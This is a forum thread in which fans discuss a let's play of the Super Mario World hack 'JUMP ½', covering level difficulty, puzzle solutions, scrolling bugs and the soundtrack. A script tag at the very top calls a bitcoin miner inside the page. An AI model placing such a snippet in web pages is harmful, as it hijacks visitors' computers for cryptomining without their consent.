<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralsmbx community

JUMP ½ - Half a jump is still a jump

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Awoo
I came here to awoo at you!
Posts: 862
Joined: 1 year ago
Pronouns: he/him/his

Re: JUMP 'n Half

Postby Awoo » 2 months ago

KobaBeach wrote:
Nimono wrote: "i saw you in the forest" when the level's about saws
Image

i didnt even realize that i thought it was just idol being vaguely ominous as she always is
You never...



Saw it coming,
Did you? nyoro~n
ワンワン :pal:
Image
Image
Avatar shamelessly taken from:


User avatar
Cyril
metal nerd
Posts: 1662
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Cyril » 2 months ago

Those were some rad puzzle levels today tbh
i've honestly never played a video game in my life

User avatar
Voltgloss
The first story's end.
Posts: 974
Joined: 5 years ago
Pronouns: he/him/his
Location: exploring the world

Re: JUMP 'n Half

Postby Voltgloss » 2 months ago

Awoo wrote: You never...



Saw it coming,
Did you? nyoro~n
i see what you did there

am i doing this right
Image

User avatar
Kilgamayan
The Real Treasure is You
Posts: 913
Joined: 10 years ago
First name: Rabi~En~Roll
Location: Location, Location.

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Kilgamayan » 2 months ago

I think sensible non-pun names that describe a level are preferable to silly names with no relation to anything whatsoever, but I also think that level names is waaaaaaaaaaaaaaaay far down the list of SMW Things Worth Getting Into a Tizzy About.

Regarding the vertical section of Spongeland, I would have to go back and rewatch the level, but I seem to recall that it always gives the player a breather space before they have to execute any series of difficult jumps. If a player has a chance to see everything coming plan, or if an offscreen obstacle is set up in such a way that a reasonable reflex/reaction based in the heat of the moment will get the player through, then the difficulty is fine even if it's really hard. Only when there are traps offscreen that are difficult/impossible to address without knowing about them in advance they're coming does the difficulty creep into the unfair BS area.

Today's puzzle levels were both super cool beans. I liked raoguy immediately forgetting that he accidentally knocked the shell into the block the goomba was sitting on and blaming it going wrong on the innocent kicker turtle in the first level.
Image Please interact Image

Image Image
Image Image

Implo
Posts: 124
Joined: 1 year ago

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Implo » 2 months ago

Nao wrote: I don't think puzzle levels were considered much when making these claims. They vary from easy to really difficult in both games, depending on the player's experience with specific mechanics, too. Most of them (atleast in JUMP1/2) are not very punishing though and the more difficult ones have movies in case you can't figure them out.
The hardest levels from JUMP included kaizo-like obstacles (Pixel Perfect) or a marathon with precision platforming (Depraved Stronghold), which I don't think anything in JUMP1/2 comes close to.
Let me explain. I'm aware that the switch level has resets and no time limit, so it should be more approachable. But it's not the case. You need to have big amount of precision that the hardest levels in JUMP had. And resets and no time limits means that you can get stuck on this level for eternity. If one level take me almost 1 hour with savestates, then for me it's indicator that this is very hard level. Similar amount of time took me exactly the hardest levels from JUMP. And I was forced to reload savestates a lot just like in this level. You know, not everybody has this good precision and understanding of the puzzles like raocow.

Nao
Posts: 58
Joined: 3 years ago

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Nao » 2 months ago

Implo wrote:
Nao wrote: I don't think puzzle levels were considered much when making these claims. They vary from easy to really difficult in both games, depending on the player's experience with specific mechanics, too. Most of them (atleast in JUMP1/2) are not very punishing though and the more difficult ones have movies in case you can't figure them out.
The hardest levels from JUMP included kaizo-like obstacles (Pixel Perfect) or a marathon with precision platforming (Depraved Stronghold), which I don't think anything in JUMP1/2 comes close to.
Let me explain. I'm aware that the switch level has resets and no time limit, so it should be more approachable. But it's not the case. You need to have big amount of precision that the hardest levels in JUMP had. And resets and no time limits means that you can get stuck on this level for eternity. If one level take me almost 1 hour with savestates, then for me it's indicator that this is very hard level. Similar amount of time took me exactly the hardest levels from JUMP. And I was forced to reload savestates a lot just like in this level. You know, not everybody has this good precision and understanding of the puzzles like raocow.
Understanding of the puzzles is one thing. But having played this hack myself, I'm not sure where levels like the switch palace require any precision, especially comparing to lategame JUMP levels seems ridiculous to me. It's just puzzle solving, the execution itself is rather simple (if you do the right things). I also don't understand what you'd need savestates for in that level, they seem to achieve nothing?

If this took you as much time as the hardest levels in JUMP, maybe you're just bad at solving puzzles but fairly good at platforming? Which is fine of course, but I think you speak for a small minority of players there.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1982
Joined: 6 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Leet » 2 months ago

Implo wrote: Seriously, I wonder why people are saying that JUMP HALF is easier than original? It doesn't feel that way for me.
because I was actually able to beat this game
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Piesonscreations
Posts: 305
Joined: 4 years ago
First name: Gon
Pronouns: he/him/his

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Piesonscreations » 2 months ago

Petition to change all the "M"s in the forum to Ns.
(Once this petition is certified, it'll now be called a forun.)
Image

User avatar
Sebby19
Posts: 2520
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Sebby19 » 2 months ago

Demo will be called Deno then. I don't think that would fly.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Mata Hari
Posts: 2202
Joined: 9 years ago

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Mata Hari » 2 months ago

I feel like there was another level recently that had an optional door... but I don't remember what was behind it for some reason... what was it again? Eh, maybe it doesn't matter

Implo
Posts: 124
Joined: 1 year ago

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Implo » 2 months ago

Nao wrote: Understanding of the puzzles is one thing. But having played this hack myself, I'm not sure where levels like the switch palace require any precision, especially comparing to lategame JUMP levels seems ridiculous to me. It's just puzzle solving, the execution itself is rather simple (if you do the right things). I also don't understand what you'd need savestates for in that level, they seem to achieve nothing?

If this took you as much time as the hardest levels in JUMP, maybe you're just bad at solving puzzles but fairly good at platforming? Which is fine of course, but I think you speak for a small minority of players there.
Well, I agree with you that some puzzles for me may be hard to understand, but in this level was different story. While I understood most of the puzzles may be hard for me, in this level I understood their solution pretty fast. I just had huge problem with execution, because it requires high amount of precision. Like with next switch palace I had much less problem: it's more puzzling, but it requires less precision. For example hitting yellow block with shell while standing on hand tiles. I understood immediately what I need to do, but it took me 10 min to execute it. Or jumping over explosion tiles with shell. That was weirdly difficult. It's so easy to destroy shell. I used savestates, because all parts of the level requires high amount of precision and if I would play without savestates, it would took me few hours to beat this level. I'm not ready for that.

Also have in mind that for a person who uses savestates, punishments aren't a problem. The real problem is execution of the level. This level was just too precise for me to play legitly.

User avatar
Super Maks 64
Just your usual SMW hacker
Posts: 331
Joined: 2 years ago
Pronouns: he/him/his
Location: Poland

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Super Maks 64 » 2 months ago

I'm late to the discussion, but

The biggest problem with the Cave of the Moving Sponges for me is the lazy layer 2 scrolling code which has no acceleration/deceleration at all and doesn't move Mario or the sprites horizontally with it. This isn't really an issue in the first half, but it's really present in the second half where most of the jumps are made more awkward due to that. I don't mind the vertical scrolling however.
The worst part is the secret exit path which has even jankier layer 2 movement that doesn't even stop for a frame and the fact that it uses Pitchin Chucks with it doesn't help at all.

User avatar
Alice
?
Posts: 2153
Joined: 7 years ago
Pronouns: Girl person
Location: Wonderland

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Alice » 2 months ago

Piesonscreations wrote: Petition to change all the "N"s in the forum to Ns.
(Once this petition is certified, it'll now be called a forun.)
But all the Ns are already Ns?

User avatar
Voltgloss
The first story's end.
Posts: 974
Joined: 5 years ago
Pronouns: he/him/his
Location: exploring the world

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby Voltgloss » 2 months ago

So why does Koopa Hiking Trail claim to have only one exit?
Image

User avatar
Ryrir
Posts: 469
Joined: 5 years ago
Pronouns: he/him/his
Location: Switzerland

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby Ryrir » 2 months ago

Voltgloss wrote: So why does Koopa Hiking Trail claim to have only one exit?
It's a mistake that will be fixed in the eventual update.

Oh while I'm posting: The p-balloon in the cinema is supposed to be a lifefarm. Hover directly above the kicked shell and you'll rack up lives fairly fast.
this is getting laundromatic

User avatar
KobaBeach
arc the lad
Posts: 1087
Joined: 6 years ago
First name: David
Pronouns: he/they
Location: Portugal

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby KobaBeach » 2 months ago


Voltgloss wrote: So why does Koopa Hiking Trail claim to have only one exit?
mindgames
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
Validon98
Goofy Night Sparrow
Posts: 364
Joined: 6 years ago
Pronouns: he/she/they
Location: Somewhere in Gensokyo

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby Validon98 » 2 months ago

So I solved that puzzle in the cinema differently, and I am 99% certain I did it in a bit more unintended way (maybe? maybe), but there is a very small fraction of time where if you bring a shell into that pipe, you can quickly place it down right in front of the pipe, run forward, grab the mushroom and star, let the star run out, then hit myself with the shell. It's very tight and I ended up killing the shell with the star a lot, but it is possible.

I realize now that maybe I was being silly. Probably. Didn't think about getting the baby Yoshi down but I guess this just means there's an alternative, way harder than you'd think variation on solving this puzzle.
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV: Shadowbringers (Shadows brought, time for postgame)
Final Fantasy V: Four Job Fiesta (Pure Chaos, no restrictions, Interdimensional Rift, let's do this)
Bloodstained: Ritual of the Night (Hard mode is in fact hard)

Strawberry Bose Partial Translations and Patches!

User avatar
FourteenthOrder
Posts: 323
Joined: 4 years ago
Pronouns: she/her

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby FourteenthOrder » 2 months ago

As of today raocow's now passed me, I need to get back to things

But that secret exit seemed really fun.
Image

General_Urist
Posts: 47
Joined: 1 year ago

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby General_Urist » 2 months ago

Damn that bovine, killing oodles of innocent hikers! For real though, raocow's Koopa hopping was pretty great!

Bowser's Cinema seems quite an interesting thing. I hope we'll get to see some of the movies eventually!

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1282
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby YelseyKing » 2 months ago

I like how you take a star warp, and suddenly... FF7 music, yo.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Awoo
I came here to awoo at you!
Posts: 862
Joined: 1 year ago
Pronouns: he/him/his

Re: JUMP sin(π/((3^2)-(3^1))) - Half 'n Half

Postby Awoo » 2 months ago

YelseyKing wrote: I like how you take a star warp, and suddenly... FF7 music, yo.
This guy are sick

Srsly though Cait Sith's theme really works well on SNES instrumentals. This whole hack's soundtrack is pretty amazing
ワンワン :pal:
Image
Image
Avatar shamelessly taken from:


User avatar
Piesonscreations
Posts: 305
Joined: 4 years ago
First name: Gon
Pronouns: he/him/his

Re: JUMP |(√(-1))/(√(-4))| - Half a junp is still a junp

Postby Piesonscreations » 2 months ago

Alice wrote: But all the Ns are already Ns?
This took me a bit to get, not gonna lie. :slow:
Image

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1282
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP sin(π/((3^2)-(3^1))) - Half 'n Half

Postby YelseyKing » 2 months ago

Awoo wrote: Srsly though Cait Sith's theme really works well on SNES instrumentals. This whole hack's soundtrack is pretty amazing
It is indeed. SMW hack music has come a long way, it would seem.

Also, that's not the only FF7 song in today's video. That beach map uses the Costa Del Sol theme.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Sebby19
Posts: 2520
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby Sebby19 » 2 months ago

Oh, oh! raocow, what does 8-bit Mario look like with a P-Balloon?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

gbreeze
Posts: 79
Joined: 3 years ago

Re: JUMP sin(π/((3^2)-(3^1))) - Half a jump is still a jump

Postby gbreeze » 2 months ago

YelseyKing wrote:
Awoo wrote: Srsly though Cait Sith's theme really works well on SNES instrumentals. This whole hack's soundtrack is pretty amazing
It is indeed. SMW hack music has come a long way, it would seem.

Also, that's not the only FF7 song in today's video. That beach map uses the Costa Del Sol theme.
That's actually not correct. It's a completely different song, but there's no way of telling that from the vid today because he didn't stay on the map long enough.


Return to “let's play”

Who is online

Users browsing this forum: Bing [Bot] and 10 guests